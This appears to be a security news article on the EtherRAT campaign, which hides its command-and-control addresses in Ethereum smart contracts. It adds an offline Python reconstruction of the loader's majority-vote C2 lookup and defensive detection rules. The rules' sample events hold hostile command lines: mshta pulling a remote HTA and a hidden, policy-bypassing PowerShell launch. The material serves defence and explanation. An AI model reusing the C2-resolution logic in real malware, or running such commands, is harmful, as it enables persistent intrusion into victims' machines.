EtherRAT and EtherHiding Malware Campaign
Researchers have documented a malware campaign, EtherRAT, that uses an unusual technique called EtherHiding to hide its command-and-control infrastructure on the Ethereum blockchain.
When people hear Ethereum (ETH), most think of the cryptocurrency, second only to Bitcoin in popularity. But the Ethereum blockchain itself can also be used to strengthen the infrastructure behind malware.
According to a report on the Cyber Security News website, a campaign distributing a remote access trojan (RAT) called EtherRAT (the source describes it as backdoor malware) was detected in March by the research team at eSentire, a company that develops Endpoint Detection and Response (EDR) tooling, after the malware was spotted on a customer's system. Investigation linked the campaign to a North Korean hacking group that lures victims into fake job interviews and, in some cases, poses as an IT team helping with a system problem; either pretext ends with the malware getting onto the victim's machine.
The tricks used to get onto the victim's machine come in several varieties. In the first, once the attacker has won the victim's trust, the victim is sent a link to a website that displays a fake error message and instructs them to run a "fix" command, which downloads and installs the malware. The command is executed via pcalua.exe (the Program Compatibility Assistant launcher) and fetches an HTA (HTML Application) script containing the malware onto the machine; this technique is known as ClickFix. In the second, the attacker contacts the victim through a tool such as Microsoft Teams and talks them into starting a remote session with Quick Assist, which gives the attacker hands-on access to the victim's machine.
What sets this malware apart is that it hides its infrastructure on the Ethereum network using EtherHiding, a technique that uses smart contracts as the lookup point for the command-and-control (C2) server, so the malware can always reach its operators even if the victim tries to cut it off from a known server.
It works like this. After the malware runs, it sends read requests to several public Ethereum RPC providers and takes the value that the largest number of them agree on as its C2 server address. When the operators want to move to a new server, they write the new address into the contract via setString, and every infected machine picks it up automatically on its next lookup, with no need to reinfect machines or push an update to them. Detection is made harder still by disguising the C2 traffic as ordinary CDN requests: the beacon URL is made to look like a request for a static file, with an extension that raises no suspicion, typically .ico, .png, or .css.
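To make the C2 lookup concrete, here is an added example (written for this page, not code from the article or from eSentire) of how an EtherHiding-style loader resolves its C2 from a contract: it builds the JSON-RPC eth_call that would go to each public RPC provider, ABI-decodes the string each provider returns, and takes the majority answer so that a stale or broken provider cannot redirect it. Nothing touches the network; the RPC responses, provider URLs, contract address and 4-byte selector are all constructed for the example.

```python
import json
from collections import Counter

# Hypothetical contract address and 4-byte selector; a real loader would embed
# the operators' contract address and the keccak256-derived selector of the
# view function that returns the C2 string.
CONTRACT = "0x000000000000000000000000000000000000dEaD"
SELECTOR = "0xdeadbeef"


def build_eth_call(contract: str, selector: str, request_id: int = 1) -> dict:
    """JSON-RPC body the loader would POST to each public RPC provider."""
    return {
        "jsonrpc": "2.0",
        "id": request_id,
        "method": "eth_call",
        "params": [{"to": contract, "data": selector}, "latest"],
    }


def abi_encode_string(value: str) -> str:
    """ABI-encode a single `string` return value: offset word, length word, padded bytes."""
    data = value.encode()
    offset = (32).to_bytes(32, "big")
    length = len(data).to_bytes(32, "big")
    padded = data + b"\x00" * (-len(data) % 32)
    return "0x" + (offset + length + padded).hex()


def abi_decode_string(hexdata: str) -> str:
    """Decode the `result` of an eth_call to a function that returns one string."""
    raw = bytes.fromhex(hexdata[2:] if hexdata.startswith("0x") else hexdata)
    if len(raw) < 64:
        raise ValueError("result too short for an ABI-encoded string")
    offset = int.from_bytes(raw[0:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("offset points outside the payload")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("declared string length exceeds the payload")
    return raw[start:start + length].decode()


def resolve_c2(responses: dict) -> str:
    """Return the C2 value that the largest number of providers agree on.

    `responses` maps provider URL -> raw JSON-RPC response body. Providers that
    return an error, garbage, or a malformed string are ignored. A tie, or no
    usable answer at all, raises instead of guessing."""
    votes = Counter()
    for body in responses.values():
        try:
            votes[abi_decode_string(json.loads(body)["result"])] += 1
        except (KeyError, TypeError, AttributeError, ValueError, UnicodeDecodeError):
            continue
    if not votes:
        raise RuntimeError("no provider returned a usable value")
    ranked = votes.most_common()
    if len(ranked) > 1 and ranked[0][1] == ranked[1][1]:
        raise RuntimeError("providers disagree; refusing to pick a C2")
    return ranked[0][0]


# Constructed sample responses: three providers return the current value, one is
# stale (has not yet seen the latest setString), one errors out. All URLs invented.
CURRENT_C2 = "https://cdn.example.invalid/static/site.css"
STALE_C2 = "https://old.example.invalid/favicon.ico"


def rpc_ok(value: str) -> str:
    return json.dumps({"jsonrpc": "2.0", "id": 1, "result": abi_encode_string(value)})


SAMPLE_RESPONSES = {
    "https://rpc-a.example.invalid": rpc_ok(CURRENT_C2),
    "https://rpc-b.example.invalid": rpc_ok(CURRENT_C2),
    "https://rpc-c.example.invalid": rpc_ok(STALE_C2),
    "https://rpc-d.example.invalid": json.dumps(
        {"jsonrpc": "2.0", "id": 1, "error": {"code": -32000, "message": "execution reverted"}}),
    "https://rpc-e.example.invalid": rpc_ok(CURRENT_C2),
}

if __name__ == "__main__":
    print("request body:", json.dumps(build_eth_call(CONTRACT, SELECTOR)))
    print("resolved C2 :", resolve_c2(SAMPLE_RESPONSES))
```

The defensive takeaway is in what the loader does not need: no hard-coded domain, no DNS lookup of its own, and no traffic to anything other than widely used public RPC endpoints. Blocking a single RPC provider only removes one vote.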
The malware can also ask the C2 server for a new version of its own code and overwrite itself with it, which makes signature-based defenses harder to apply. For persistence it adds an entry to the Windows Registry Run key whose name is a random 12-character hexadecimal string, so there is no fixed pattern to match on, and it runs itself through conhost.exe in headless mode.
For protection, the research team advised blocking mshta.exe and pcalua.exe via AppLocker or Windows Defender Application Control (WDAC) so that the malware's scripts cannot run on the machine.
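The behaviours described above (the pcalua.exe to mshta.exe ClickFix chain, beacons disguised as static .ico/.png/.css requests, the random 12-hex-character Run key name, and the conhost.exe headless launch) are all things a detection engineer can write rules for. The following is an added example, not the researchers' own detection content, that runs such rules over a handful of constructed Sysmon-like events; the event field names and every path and URL in the sample are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Run-key value names that are exactly 12 hex characters (the randomised name
# the article describes). Matched against the last path component.
HEX12 = re.compile(r"^[0-9a-f]{12}$", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", re.IGNORECASE)
# Beacon URLs dressed up as static assets.
STATIC_ASSET = re.compile(r"\.(ico|png|css)(\?.*)?$", re.IGNORECASE)
# Processes that have no business fetching "CDN assets" on their own.
SCRIPT_HOSTS = {"mshta.exe", "conhost.exe", "powershell.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    event_index: int
    detail: str


def exe_name(path: str) -> str:
    """Normalise an image path to its lower-case file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(i: int, ev: dict) -> list:
    parent = exe_name(ev.get("parent_image", ""))
    child = exe_name(ev.get("image", ""))
    cmd = ev.get("command_line", "")
    out = []
    # ClickFix chain: the "fix" command launched via pcalua.exe spawning mshta.exe.
    if parent == "pcalua.exe" and child == "mshta.exe":
        out.append(Finding("pcalua_spawns_mshta", i, cmd))
    # mshta.exe pulling an HTA from a remote URL.
    if child == "mshta.exe" and re.search(r"https?://", cmd, re.IGNORECASE):
        out.append(Finding("mshta_remote_hta", i, cmd))
    # Payload re-launched through conhost.exe in headless mode.
    if child == "conhost.exe" and "--headless" in cmd.lower():
        out.append(Finding("conhost_headless", i, cmd))
    return out


def check_registry(i: int, ev: dict) -> list:
    target = ev.get("target_object", "")
    if RUN_KEY.search(target) and HEX12.match(target.rsplit("\\", 1)[-1]):
        return [Finding("run_key_random_hex12", i, target)]
    return []


def check_network(i: int, ev: dict) -> list:
    url = ev.get("url", "")
    if exe_name(ev.get("image", "")) in SCRIPT_HOSTS and STATIC_ASSET.search(url):
        return [Finding("static_asset_beacon_from_script_host", i, url)]
    return []


CHECKS = {"process": check_process, "registry": check_registry, "network": check_network}


def run_detections(events: list) -> list:
    findings = []
    for i, ev in enumerate(events):
        findings.extend(CHECKS.get(ev.get("type"), lambda *_: [])(i, ev))
    return findings


# Constructed sample events (Sysmon-like, simplified; field names are assumptions).
SAMPLE_EVENTS = [
    {"type": "process", "parent_image": r"C:\Windows\System32\pcalua.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://update.example.invalid/fix.hta"},
    {"type": "registry",
     "target_object": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\4f2a9c1be07d"},
    {"type": "registry",
     "target_object": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
    {"type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\conhost.exe",
     "command_line": "conhost.exe --headless powershell.exe -w hidden -ep bypass -f C:\\Users\\Public\\a.ps1"},
    {"type": "network", "image": r"C:\Windows\System32\mshta.exe",
     "url": "https://cdn.example.invalid/assets/logo.png"},
    {"type": "network", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "url": "https://cdn.example.invalid/assets/logo.png"},
    {"type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

if __name__ == "__main__":
    for f in run_detections(SAMPLE_EVENTS):
        print(f"[{f.rule}] event {f.event_index}: {f.detail}")
```

The network rule deliberately keys on the requesting process rather than the URL alone: a browser fetching logo.png is normal, mshta.exe or a headless conhost.exe doing so is not. That is the same reasoning behind the AppLocker/WDAC advice above; if mshta.exe and pcalua.exe cannot run at all, the first two rules never need to fire.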